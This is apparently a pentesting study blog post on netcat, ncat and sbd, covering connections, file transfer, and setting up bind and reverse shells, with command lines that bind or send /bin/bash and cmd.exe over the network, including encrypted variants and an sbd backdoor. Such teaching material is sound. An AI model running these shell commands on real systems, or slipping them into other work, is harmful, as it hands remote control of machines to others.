NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.

You are here: Home / Linux / netcat, ncat & sbd

netcat, ncat & sbd

by 2 Comments

netcat

Netcat is a tool that reads or writes to/from TCP and UDP network sockets. It can act as a client or server or scanner.

The simplest possible use is:

As a network client

nc 10.0.0.1 25  – netcat will attempt to connect (as a client by default) to port 25 (using TCP by default) on that IP address. It accepts a number of options:

-v = verbose – give more information

-vv = very verbose

-n = no DNS lookup

As a listener

nc -nlvp 5555 – will bind to local port 5555 and listen for incoming connections

-l = listen mode

-p = port number

You can then use another instance of netcat on another machine, as a client to connect to 5555 on their listener’s IP and the two netcats will talk to each other. Any text typed will be sent to the other client or listener. You could use this as a basic chat system.

To Transfer Files

On the receiving machine set up a listener outputting to a file:

nc -nlvp 5555 > filename.exe

On the sending machine set up a client accepting input from the file to be transferred:

nc -nv 10.0.0.1 5555 < /usr/share/filename.exe

 

Bind Shell

Machine 1 is a linux box behind a NAT firewall. Machine 2 is a Win7 box, directly accessible on the network with no NAT.

To remotely control Machine 2 we can set up a listener on it and connect from Machine 1:

Machine 2: nc -nlvp 5555 -e cmd.exe   (listener – to be controlled)

-e = execute using this program, forwarding STDIN and STDOUT to the bound port on the network

Machine 1 (behind NAT): nc 10.0.0.1 5555   (client – taking control)

On connection Machine 1 will display the command prompt from Machine 2 as cmd.exe is now bound to port 5555.

Reverse Shell

When the machine to be controlled is behind a firewall restricting incoming traffic.

To remotely control Machine 1, we cannot simply reverse the nc commands because it’s behind a NAT firewall and so listening on port 5555 is pointless as, unless that port has been forwarded, no traffic will get through. So Machine 1 must still use a netcat client and Machine 2 must send its shell to Machine 1.

Machine 2: nc -nlvp 5555 (listener – taking control)

Machine 1: nc -nv 10.0.0.1 5555 -e /bin/bash (client – to be controlled)

Note here the -e shell option is running on the client end and is being sent to the listening machine

The easy way to remember is:
  1. The -e shell option can be on a netcat listener or client
  2. Listener goes on the non NAT machine
  3. The -e shell option goes on the machine to be controlled

ncat

ncat is a more fully featured version of netcat and can overcome some of the limitations of netcat, including creating encrypted connections and limiting connection to those from certain IPs.

Secure Bind Shell

ncat -lvp 5555 -e cmd.exe –allow 10.0.0.9 –ssl (listener)
ncat -v 10.0.0.1 5555 –ssl (client)

Secure Revese Shell

ncat -lvp 5555 –allow 10.0.0.9 –ssl (listener/server)
ncat -v 10.0.0.1 5555 -e /bin/bash –ssl (client)

 

SBD

sbd stands for Secure Back Door and is another netcat like tool. It has features like ssl encryption, restricted access, shared keys etc

sbd -l -p 5555 -e bash -v -n (listener, bind shell on linux)
sbd 10.0.0.5 5555 (client)

Comments

Leave a Reply

Your e-mail address will not be published. Required fields are marked *